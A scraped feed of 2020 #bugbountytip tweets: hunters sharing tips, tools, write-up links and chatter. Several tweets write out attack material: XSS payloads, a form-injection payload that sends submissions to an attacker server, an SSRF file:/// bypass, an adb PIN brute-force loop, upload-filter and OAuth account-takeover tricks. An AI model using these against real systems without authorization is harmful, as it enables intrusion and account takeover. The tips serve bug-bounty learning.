2 Cyber Security News Flash by @hykersec @HusseiN98D: 'WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were โ€ฆ https://t.co/JHa7zDItBt, see more https://t.co/nF4yR9PGZj
setec:astronomy
@infowaropcenter


2020-02-02 18:42:04
0 Top story's from my Newspaper @HusseiN98D: 'WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were not mentiโ€ฆ https://t.co/N5BsQh0yO4, see more https://t.co/OzpGs17X9M
Your Next Bug Tip
@YourNextBug


2020-02-02 14:48:28
0 BLH - Broken Link Hijacking Just suppose Ur site uses cool.c/Script.js After few year cool.c decided to close it services. Now story begins ๐Ÿ˜ˆ buys cool.c and then host Script.js BOoOM This happened to Linkedin READ BELOW #bugbountytips #bugbountytip #bugbounty https://t.co/isLO5QMG0w
๐š› ๐šŽ ๐šฃ ๐Ÿถ
@rez0__


2020-02-02 13:02:27
0 Thanks for the awesome shoutout in your video @InsiderPhD! #bugbountytips #bugbountytip
Hussein Daher
@HusseiN98D


2020-02-02 12:48:15
15 WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were not mentionned. RT, Like and Comments are appreciated. For any pentest work DM me:) ๐ŸŽ‰๐ŸŽ‰ https://t.co/nlAv4pMPhx
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-02-02 12:32:58
0 Reflected XSS https://t.co/TNZFocIB07 https://t.co/qxizmngi1Y https://t.co/qkg2tCZPJt https://t.co/tDIISt8s5o https://t.co/fywnUUvRJ8 https://t.co/rR1eG6xktM https://t.co/HBCDQ9WLS4 https://t.co/Kn5J7zoqKF https://t.co/zvsERH62Ok https://t.co/01CJDlehsT #bugbounty #bugbountytip
๐š› ๐šŽ ๐šฃ ๐Ÿถ
@rez0__


2020-02-02 12:31:36
0 Thanks for awesome shoutout in your video @InsiderPhD! #bugbountytips #bugbountytip https://t.co/MmkseVcmLQ
Sunil
@Sunilkande1137


2020-02-02 03:17:45
5 240+ good hacking resources at one place. https://t.co/Iab3Gg7Gyb #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsecย  #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-02-01 06:56:52
0 Haha, as excepted no one is sharing, Ok then Share the worst external bug bounty program, atleast it will save other's time. ๐Ÿ˜‰ #bugbounty #bugbountytip #BugBountyTips https://t.co/UG7ktzJX40
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-01 05:00:34
0 Watch Out for Coronavirus Phishing Scams https://t.co/B4yqri19tw Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-01 02:11:54
4 #OSINT : Better Whois:https://t.co/zqCvzqzJyy Active Whois:https://t.co/KtnxHQw6WZ ZabaSearch:https://t.co/5JhzsgJad3 TinEye:https://t.co/XCcelTU0ox isearch:https://t.co/03W18bTDhL serversniff:https://t.co/RTccIDZOJj robtex:https://t.co/xDzAcSX3iO #BugBountyTip #Hacking #pentest
Byron Smith
@MainframeGuyBS


2020-01-31 19:23:33
0 Look what I found on @LinkedIn ๐Ÿ˜Ž Have fun my friends, BUG OUT. #CyberSecurity #Security #BugBountyTip #bugbountytips #Hackers #SecurityResearcher #TheCyberSecurityHub https://t.co/8oCpnkRIly
Joe Doran
@TheRealJoeDoran


2020-01-31 18:54:09
0 What mind mapping software do you use for large scope pentests? I think Iโ€™ve outgrown plain text files. #Pentesting #BugBountyTip
Your Next Bug Tip
@YourNextBug


2020-01-31 16:40:47
3 Any good external bug bounty program? #bugbounty #bugbountytips #bugbountytip
AK
@theanonymouscub


2020-01-31 15:43:10
0 Generally people don't tweet against Chinese and Russian ...... Reason :-. They fear their mobile phones and PCs could get hacked ! #caronavirus #cornavirus #PrayForChina #hackerone #Hackers #hackathon #bugcrowd #togetherwehitharder #bugbounty #BugBountyTip
Th3Alch3mist~
@Debian_Hunter


2020-01-31 14:01:24
0 OAuth+Host Header Injection leads to Account Takeover ๐Ÿค™simple yet nice tip for beginners #bugbountytip #bughunting #infosec #bugbounty https://t.co/6qItnrR9Ky
Your Next Bug Tip
@YourNextBug


2020-01-31 13:41:59
1 Steps 0) Login in with Twitter 1) Host Header Injection [to a.cxx] 2) Generate OAuth Token's Link 3) Send link to Victim, after victim authorize 4) Verifier send to a.cxx 5) Reuse use token Account Takeover by @ngalongc #bugbountytips #bugbountytip https://t.co/fstnEFS244
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-31 13:07:47
0 Bug Hunter Life ๐Ÿค–โœ…โค๏ธ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/zL6mBl7w1Z
youssef
@genieyou


2020-01-31 12:20:48
2 awesome idea for you blog @filedescriptor @ngalongc @EdOverflow great article congrats https://t.co/HdMi507hh4 #BugBounty #bugbountytips #BugBountyTip
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2020-01-31 11:32:52
4 ยป_ everything is not as it seems. ๐ŸŽƒ ยซinputยป; p=-alert(1)}//\ $result* var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"}; ยซinputยป; p=\&q=-alert(1)// $result* var n = {a: "\", b: "-alert(1)}//"}; #BugBounty #BugBountyTip #WAF #infosec
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-31 10:08:16
1 Bug Bounty Life Cycle ๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/WQOAxWKgfW
Yadhavi
@PrincessYadhavi


2020-01-31 10:08:03
0 Do you know any labs (free or paid ) to practice new CVEs online? Except @PentesterLab and pentesteracademy #bugbountytips #bugbounty #bugbountytip
Zerorose Inc.
@zeroroseinc


2020-01-31 06:53:03
0 Ethiopian governments shadowy #bugbounty initiative to reward for bugs and exploits in popular software. I believe first of it's kind for this kind of talent recruitment in Africa. Impressive! https://t.co/Hixyo8AoXS #bugbountytips #bugbountytip
m0z
@LooseSecurity


2020-01-31 00:24:24
4 Install Python. Open yourself up to a word of open-source bug bounty tools. Don't put it off, because it will enrich your skills. #BugBounty #bugbountytips #BugBountyTip #infosec #infosecurity
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-30 23:24:58
2 HTTP Request Smuggling -Socket Poisoning https://t.co/F8AECN2aaq #bugbountytips #BugBountyTip #bugbounty #http #infosec #cybersecurity https://t.co/f3cdoy3tIH
Donato Scaramuzzo
@ramirezVII


2020-01-30 19:30:50
0 Button disabled? Inspect Element -> change from "disabled" to "enabeld" -> Button enabeld and action performed #BugBountyTip ๐Ÿ’ช๐Ÿป๐Ÿ˜†
Rushiikesh ๐Ÿ‡ฎ๐Ÿ‡ณ
@u1tran00b


2020-01-30 17:56:43
0 An Interesting Account Takeover: ๐Ÿ˜ƒ #infosec #bugbountytips #BugBountyTip #hackerone #bugcrowd Credits: @fatratfatrat โค๏ธ๐Ÿ’ฅ๐Ÿค˜ https://t.co/fPCoT5hV5W
AEMSecurity
@AEMSecurity


2020-01-30 16:29:18
1 [+] #BugbountyTip: When testing for anonymous write access on Adobe AEM in "/content/usergenerated/*" If you get HTTP 404, try bypassing the dispatcher filter rules like this: "/ANYEXISTINGFOLDER/..../content/usergenerated/test" #Bugbounty #TogetherWeHitHarder #AdobeAEM
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-30 16:25:24
1 Cyber Security ๐Ÿคช๐Ÿค–๐Ÿค–๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Wsmd27pcML
fuzzsqlbOf
@fuzzsqlbof


2020-01-30 15:47:29
5 read my detailed writeup on HTTP Request Smuggling which i found in pvt program https://t.co/rUevK40Ip9 #bugbountytips #togetherwehitharder #bugbounty @albinowax #hackerone #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-01-30 15:31:14
0 Thanks @traceableai for providing API testing resources(tips) There aren't many info about API testing but your tups and this blog post is awesome to learn API Testing #bugbountytips #bugbountytip #bugbounty https://t.co/6gI1kS7I7A
Zerorose Inc.
@zeroroseinc


2020-01-30 14:32:55
1 Accellion SSRF to LFD by exploiting a weak regex /$http://site.com/i -- without the ^ in the front so bypassing with file:///file#http://site.com by @PaulosYibelo https://t.co/I1iJ2ZnfqH #bugbountytips #bugbounty #bugbountytip
The Bug Bounty Podcast
@bounty_podcast


2020-01-30 13:17:17
3 Episode #2 - We sit down with @0xacb to talk about how to be successful in bug bounty, live events, music and creativity and of course, how to reach cosmic brain level 10. Listen on https://t.co/eY3KgecFBv #bountylife #bugbounty #bugbountypodcast #bugbountytip #bbp
INTIGRITI
@intigriti


2020-01-30 13:06:53
49 Some #bugbounty hunters made over โ‚ฌ50.000 in bug bounties with this simple trick. ๐Ÿค‘ Thanks for the #BugBountyTip, @rez0__! https://t.co/z9sPFJTNqV
Black Turtle
@thebl4ckturtle


2020-01-30 10:30:20
0 A simple tool to detect wildcards domain based on Amass's wildcards detector. https://t.co/SrZP1KwNqh P/s: @jeff_foley Thanks for created an awesome tool! #bugbounty #golang #bugbountytip #bugbountytips
Andy Garcia
@GaelleTjat


2020-01-30 06:45:34
0 A Webshell story https://t.co/pOHt81i6dZ #bugbountytip @Hacker0x01 @Jhaddix #infosec
Robr
@sweepthatleg


2020-01-30 00:21:43
0 Always a fan of @LittleJoeTables creations. This time โšก fast screen shots in a convenient desktop app #bugbounty #bugbountytip #infosec #electron #javascript https://t.co/k9ae1Yk8Zq
z3rb0a
@OwlCyberGhost1


2020-01-30 00:14:41
0 My first race condition . They not view it as serious security risk. But rewarded me for appreciation #bugbounty #bugbountytip #hackerone #TogetherWeHitHarder https://t.co/UeArHgwfWr
Andri Wahyudi ๐Ÿ•Š๏ธ
@andripwn


2020-01-29 20:30:25
1 Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin https://t.co/gZdRnaJYdY #bugbountytip #bugbountytips #wordpress #vulnerability
Samet SAHIN
@sametsahinnet


2020-01-29 19:28:57
2 If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity. #bugbountytip #bugbountytips https://t.co/140rJjo5Nt
Abhijeet Singh
@abhiunix


2020-01-29 16:15:03
0 My first bounty, after 25+ dups and 2 N/As. Got Hall of Fame in few programs but never get paid. Thanks to all members of bug bounty community. @Hacker0x01 A special Thanks to @OffensiveHunter Sir & @abhinavbom Sir for the guidance. #bugbounty #bugbountytip #TogetherWeHitHarder https://t.co/kKQQZ84Bba
Lรผtfรผ Mert Ceylan
@lutfumertceylan


2020-01-29 12:04:44
0 An exploit, 240+ affected site (Reflected XSS) @openbugbounty #BugBounty #bugbountytip https://t.co/Rp6SFcEOVY
Ujwal Kumar
@Ujwal07kumar


2020-01-29 08:01:22
1 https://t.co/mzK8B5B2zR Have written a blog on Bug bounty with Google recon. Contains list of dorks to check for juicy contents. Recommended to developers and security folks. #security #dataprivacy #bugbounty #bugbountytip Any suggestions are welcome. :)
Harsh Jaiswal
@rootxharsh


2020-01-29 02:45:10
1 One more: Find a subdomain such as <grafana>.corp.company.com which points to a external IP example however only accessible inside VPN and such SSRF could be leveraged in that way. You can often find such hosts over SSL. Have exploited such in pasts. Might even be a #bugbountytip https://t.co/lusB0fAEnU https://t.co/BVA99w6ios
Zerorose Inc.
@zeroroseinc


2020-01-28 22:15:59
2 Yahoo homepage strightfwd XSS by @PaulosYibelo from end of 2019. https://t.co/Il48kikn29 #bugbounty #bugbountytip
d4d
@d4d89704243


2020-01-28 20:36:48
0 I was able to successfully exploit the vulnerabilities in PHP parse_url from @orange_8361 article of 2017 https://t.co/jCdIuhFtz0 and found new way to exploit curl uri parser #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-01-28 18:54:08
5 #OSINT DomainTools:https://t.co/zFCGR0Un8G Active Whois:https://t.co/KtnxHQevyp Domain Dossier:https://t.co/hjdz9aNJuW Network Solutions:https://t.co/rZhFIOmJVZ DNSstuff:https://t.co/C5T85kfbOB DNS-Digger:https://t.co/FWwXrCvNdm Shodan:https://t.co/U8xoj0R4dN #bugbountytip
Aish Kendle
@aish_kendle


2020-01-28 18:24:49
0 Got my first Subdomain Takeover! #ReconWins #bugbountytips #bugbounty #s3 #aws #azure #bounty #bug #bughunting #infosec #reward #bugbountytip #first #recon #cybersecurity #infosec #cyberattack #hacking https://t.co/07eVXqCIWS
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-28 10:24:17
1 Hackers Say Yo ! ๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/vheJORritR
Abhishek ๐Ÿ•ต๏ธ
@abhishake100


2020-01-28 09:49:36
0 I just published "Hyperlink Injection - Easy Money (sometimes)" #bugbounty #bug #bounty #bugbountytip https://t.co/zLbLOZraqX
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-28 09:23:49
2 Online Privacy is a MYTH ! ๐Ÿค–๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pFsxZWkByp
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-28 09:20:31
4 Life of Cyber Security Professionals ๐Ÿค–๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/5mjA2uBFTJ
x1m
@x1m_martijn


2020-01-28 09:08:24
0 Clean desk, clean mind ๐Ÿ˜Œโ˜บ๏ธ #infosec #bugbountytip https://t.co/Q8YxsF6cr6
Th3Alch3mist~
@Debian_Hunter


2020-01-28 07:32:17
0 Sweet as candy ๐Ÿฌ nice tip #bugbountytip #infosec https://t.co/uWJAWNJpv9
Hx01
@Hxzeroone


2020-01-28 06:47:12
0 @Kr0t3 Iโ€™d suggest creating a twitter bot which fetches tips with hashtags like #bugbountytip
Mashoud1122
@mashoud1122


2020-01-27 18:01:55
2 There are some endpoints show JSON, but forget to set the header to โ€œContent-type: application/jsonโ€ and leave it as โ€œContent-type: text/htmlโ€ , and they show special chars , easy XSS ;) #bugbountytip #bugbountytips #BugBounty
o k t a v a n d i
@0ktavandi


2020-01-27 11:49:23
0 Never trust a public cheatsheet , cheatsheet is just a reference for purpose development , make your own cheatsheet #protip #bugbountytips #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-27 10:20:59
2 Send Any Message From Snapchat to anyone. Snapchat Hacked By: Mohammad Khizer Javed https://t.co/LnkvBjqndu #bugbountytips #bugbountytip #bugbounty
M. Khizer Javed
@KHIZER_JAVED47


2020-01-27 08:57:21
0 Instant Admin Access!! #Takeaways always check JS files and request responses. This tool by @jobertabma is pretty good in looking for endpoints https://t.co/1iTFImCerY #BugBounty #bugbountytips #bugbountytip
Tomi
@noobe_io


2020-01-27 06:33:24
0 Start this week with Authentication Bypass XD #BugBounty #bugcrowd #bugbountytip https://t.co/kh7QfZoECi
Himanshu Giri
@Himanshuraj17Hr


2020-01-27 06:18:18
2 If there is no rate limit on PIN functionality of Android APK ,but the app is protected by every mechanism, then try to brute Force using adb . for i in {0000..9999}; do adb shell input text $i ; done #BugBounty #BugBountyTip #bugbounties #bugbountytips #600$
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-27 04:35:18
0 #RDP #HACKING Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FoMZwetU8T
human
@t0ddpar0dy


2020-01-26 23:13:03
0 Show. Me. Your. Vuln Face! You knowโ€”the face you make when youโ€™ve found the unthinkable.. #BugBountyTip #BugBounty #hackers
m0z
@LooseSecurity


2020-01-26 18:57:33
0 For enumerating subdomains I always use @zer0pwn's Spyse API wrapper. It's so f'in good! https://t.co/zBAsuiKw7c #bugbountytips #bugbountytip #bugbounties #bugbounty #infosec
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-26 17:22:52
3 #redteam Security Assessments Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone #follow https://t.co/CGKg7E7EiX
Maximiliano Soler
@MaxiSoler


2020-01-25 22:48:09
1 It has been a blast! Seeing the local community sharing and helping each others. Kudos @ylevalle @soyelmago and @Hacker0x01 Crew @Arl_rose & @sgtcardigan ๐Ÿ‡ฆ๐Ÿ‡ท #BugBountyTip #togetherwehitharder ๐Ÿ’ช๐Ÿพ https://t.co/xj6RDkiLiL
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-01-25 22:41:08
8 -PENTESTING-BIBLE: https://t.co/q2layzVpKz -OSINT_TIPS: https://t.co/gNMSDGULS6 #BugBountyTip #Hacking #pentest #OSINT #redteam #Malware #CyberSecurity #Linux #html5 #computerscience #infosec #Python
Junaid Khan
@akajunoon


2020-01-25 18:59:05
0 Last Two Months was so surprising for me ... Demanded infinite help from other to learn Bug Hunting but sadly one thing i learned ... They will help you until and unless you have something giving them back . #bugbountytips #hackerone #BugBountyTip #hackers
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-25 17:41:59
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FmFBqH5ihS
noobSecurity
@noobsec_org


2020-01-25 16:07:26
2 Always view the page source code, sometime u get some GOLD like mdfk this๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ P1 just in 5 minutes #bugbountytips #bugbountytip #OuthackThemAll #ItTakesACrowd #togetherwehitharder https://t.co/eFXvbt5abw
Katie Paxton-Fear
@InsiderPhD


2020-01-25 16:00:01
11 ๐ŸšจNew video! This week we talk about CSRF bugs, definitely one of the more technical beginner bugs, but actually not that difficult once you get your head around them. Case studies as usual but also some PoC code + a demo #BugBounty #bugbountytip https://t.co/zUxcUwLts9 https://t.co/Ia75ItLYDj
Sayaan Alam
@ehsayaan


2020-01-25 13:16:05
1 Just did a write-up on my recent finding. #bugbountytip #writeup #bugbounty โ€œAccidental IDOR that Deleted Admin Account.โ€ by Sayaan Alam https://t.co/LURpTYicyi
Imran Parray
@CreedHackers


2020-01-25 12:50:53
2 #bugbountytip Mastering a single bug class is better than being noob at everything. #bugbounty #infosec
Hussein Daher
@HusseiN98D


2020-01-25 12:28:21
2 #BugBountyTip time: combine Arjun from @s0md3v with BurpIntuder to bruteforce parameter values. I once got "?debug" as a valid parameter and got "on" as a good value which disclosed juicy information helping me chain bugs to a P1. Final: "?debug=on" #bugbountytips #pentest RT & L
Leonishan
@leonishan_


2020-01-25 11:12:49
3 Detecting valid tags/events on XSS exploitation. A script to find suitable XSS payloads after analyzing how tags/events are filtered. https://t.co/u6WxTL5gBe https://t.co/n9zMuRW8gX #XSS #bugbountytip #bugbounty
Th3Alch3mist~
@Debian_Hunter


2020-01-25 10:28:39
0 I Found this tool while recon and let me tell you something "IT'S AWESOME!! " xd check this out it collects many information automatically using different tools so you must run it if you are starting a new program #bugbountytip #bugbounty #bugbountytool https://t.co/M2FUBHycMM
Sayaan Alam
@ehsayaan


2020-01-25 09:00:00
0 Good Opportunity to protect your country.. #bugbountytip https://t.co/xcTrdnlM7r
reconness
@reconness


2020-01-25 00:57:13
0 Remember you can join us in our Discord Server https://t.co/LIWdtvdJmT #bugbountytip #Pentesting #recon
M. Khizer Javed
@KHIZER_JAVED47


2020-01-24 18:12:20
1 #BugBountyTip While looking in github for information desc do check commit history sometimes they remove the tokens but don't change or revoke them ;) https://t.co/r05vUKKkuX
bug bounty tips - Retweet
@YourNextBug


2020-01-24 16:34:38
0 Read Any File using .odc file Hacked By @pnig0s Read Here https://t.co/lpqCZYApLX #bugbountytips #bugbountytip
thehackerish
@thehackerish


2020-01-24 07:13:36
0 I remember when I saw Sqlmap the first time mentioned in @rootme_org, I was exploiting #SQL injections manually or via Python scripts, then fell in love with how effective Sqlmap was. #BugBountyTip: It is a must have tool to master, follow @sqlmap for advanced usage.
bug bounty tips - Retweet
@YourNextBug


2020-01-24 02:31:48
1 Found a b-sqli Status-same Cont. Length - Same Visible Content Same Looking at source code found that right query adds a <div></div> false query remove the <div></div> But No change in content length, probably it was adding something else. #bugbountytips #bugbountytip
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-23 22:46:52
2 1) skf-labs :> Repo for all the OWASP-SKF Docker lab examples https://t.co/7cIL06hS9Y #) KernelMalware https://t.co/1HrR6S7LWx #bugbounty #bugbountytips #BugBountyTip #kernel #malware
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-23 22:43:50
0 1) New Muhstik Botnet Attacks Target Tomato Routers https://t.co/AHgAbfr8CE 2) AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model https://t.co/aVNdKucwHG #bugbounty #bugbountytips #BugBountyTip
Virus
@Virus0X01


2020-01-23 21:16:15
0 read my write up about CORS i found in a private program #bugbounty #BugBountyTip https://t.co/tLvlcrf7SO
0xNoah
@ncnx700


2020-01-23 20:46:49
1 I want to get my blog set up. I'm interested in what people think the best platform or method of going about it is. I'm willing to manually set up and configure one if I choose to host it myself. Please retweet for visibility! #infosec #CyberSecurity #OSINT #H1 #BugBountyTip
terjanq
@terjanq


2020-01-23 16:31:52
5 I started writing solutions to my challenges on #justctf quite a time ago but haven't had enough time to finish it. I decided to publish these very chaotic writeups to Dominoes, Scam Generator and p&q service. #xssearch #bugbountytip https://t.co/eImStmRiuT
Damian Schwyrz
@damian_89_


2020-01-23 15:39:16
0 Nice, found an older adminer version on a host which allows using "Elasticsearch (beta)" as a source and it turns out, we can abuse this. At least blind ssrf ;) #bugbountytip https://t.co/rj59BI1SHv
Hendrik
@hendrikvb


2020-01-23 14:14:50
0 Asking for a friend: #ethicalhacking means you *should not* abuse a sequential recipient ID in a spam newsletter โ€œView Onlineโ€ link and click unsubscribe for all victims.. right? #BugBountyTip #spam
Eduard Tolosa
@Edu4rdSHL


2020-01-23 12:30:17
5 Bash function to check domain wilcards. Add it to your .bashrc and use it with: check_wilcard domain.example #bugbounty #bugbountytips #bugbountytip #bash #linux https://t.co/Sa1z4u8Lfy
Jenish
@_jensec


2020-01-23 08:24:43
13 2nd critical of this week. #BugBountyTip Abuse ouath Sign-up flow: 1) Use phone number instead email in 3rd party to sign-up. 2) Link victim's email to your 3rd party account while singnup on target. 3) Login to vicitim's account using your 3rd party account. https://t.co/4yrK5KXa4v
SPAWN POINT GAMING
@gametestingsp


2020-01-23 06:58:07
0 A #game plagued by #Bugs/#Glitches is the worst nightmare for #GameDevelopers! So what are bugs and their types in a game? Click here to read this #BLOG ๐Ÿ‘‰๐ŸŽฎ https://t.co/y5BiX492wh #Gamedev #BugBountyTip #Indiedev #MobileGame #Androidgames #readers #article #gamingblog #unity
GokhanGK
@gkhck_


2020-01-23 06:55:02
1 Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting Payload : %3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm CVE-2018-5230 https://t.co/Ulv9nwcnQv #bugbountytip #bugbountytips https://t.co/nXx2Xiu4jQ
Jerry @unitedconindia
@lordjerry0x01


2020-01-23 05:12:08
0 You may find this useful ๐Ÿ˜‰ #BugBountyTip #bugbounty #hacking https://t.co/wWk7EwV7zS
Nassec.io
@nassecio


2020-01-23 03:30:51
8 @evilboyajay comes up with another #bugbountywriteup on this week's blog - this time about Host-Header Injection. #informationsecurity #cybersecurity #bugbounty #infosecmatters #writeups #hostheaderinjection #bugbountytip https://t.co/E7hXZo0XaV
Th3Alch3mist~
@Debian_Hunter


2020-01-23 03:11:35
0 Check this out it's cool #bugbountytips #bugbounty #BugBountyTip https://t.co/49rkPVwoDQ
Hussein Daher
@HusseiN98D


2020-01-22 23:06:21
18 #BugBountyTip time: I've got a RCE by using this tip: while testing for malicious file uploads, if .php extension is blacklisted you can try .PhP , .php5 and .php3 Sometime this fools the backend and you get shell! RTs & comments are appreciated. Follow #bugbountytips #pentest
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-22 22:01:22
1 Bugbounty Checklist By Sehno https://t.co/wshOrucUjT #bugbounty #BugBountyTip #bugbounty2020goals #bigbountytips #infosec #security #nullcrowd https://t.co/0FoTN4pcEf
bug bounty tips - Retweet
@YourNextBug


2020-01-22 18:02:41
2 One can drive a bike at 80km/hr and someone can drive the same bike at 120 km/hr. Its matter of knowing the tool and practicing it. BLOG ON SHODAN Using Shodan Better Way by @0xrudrapratap https://t.co/HUrxeMQM94 #bugbountytips #bugbountytip
Rafin Rahman Chy
@rafinrahmanchy


2020-01-22 17:56:27
0 Guides for Business Logic Flaw https://t.co/chT0dwJAee https://t.co/RnwFmNfdwj https://t.co/t9aNa8GVOe #BugBounty #bugbountytip #bugbountytips #websecurity #appsec #netsec #pentesting #pentest #EthicalHacking #EthicalHacker #Hacking #Hacker #InfoSec #InfoSecurity #CyberSecurity
bugbountymemes
@bugbounty_memes


2020-01-22 16:27:28
0 #bugbountytip when report closed as duplicate ๐Ÿ˜€๐Ÿ˜€ https://t.co/p7IrtWLPED
Cryptographer
@crypt0gr4ph3r


2020-01-22 16:24:27
3 Awarded $100 bounty on @Hacker0x01 in less than 1 minute 1. Reported bug and got duplicate :( 2. Added in original report 3. Waited for fixed. Before :- x(.)com/abc/payload 3. Bypassed fix :- Just changed to :- x(.)com/abC/payload #bugbounty #bugbountytip #hackerone
bug bounty tips - Retweet
@YourNextBug


2020-01-22 15:19:25
2 Just Like Second order sqli and xss, Here is Second order IDOR. MUST CHECK OUT #bugbountytips #bugbountytip #bugbounty https://t.co/wWdvIjNBOt
Eduard Tolosa
@Edu4rdSHL


2020-01-22 14:29:12
1 Second part of โ€œSubdomains Enumeration: what is, how to do it, monitoring automation using webhooks and centralizing your findings" is coming soon. Follow me to be aware. First part quoted. #BugBounty #bugbountytip #recon #hacking #osint #findomain #bugbountytips #webhooks https://t.co/SHKFdYiq2K
Ankit(Rudra16)
@rudra16t


2020-01-22 12:20:55
2 Watch our expert @fransrosen keynote from @bsidesahmedabad ๐Ÿ˜๐Ÿ˜ #infosec #bugbounty #BugBountyTip https://t.co/KL8BybPIaV
BSides Ahmedabad
@bsidesahmedabad


2020-01-22 12:17:04
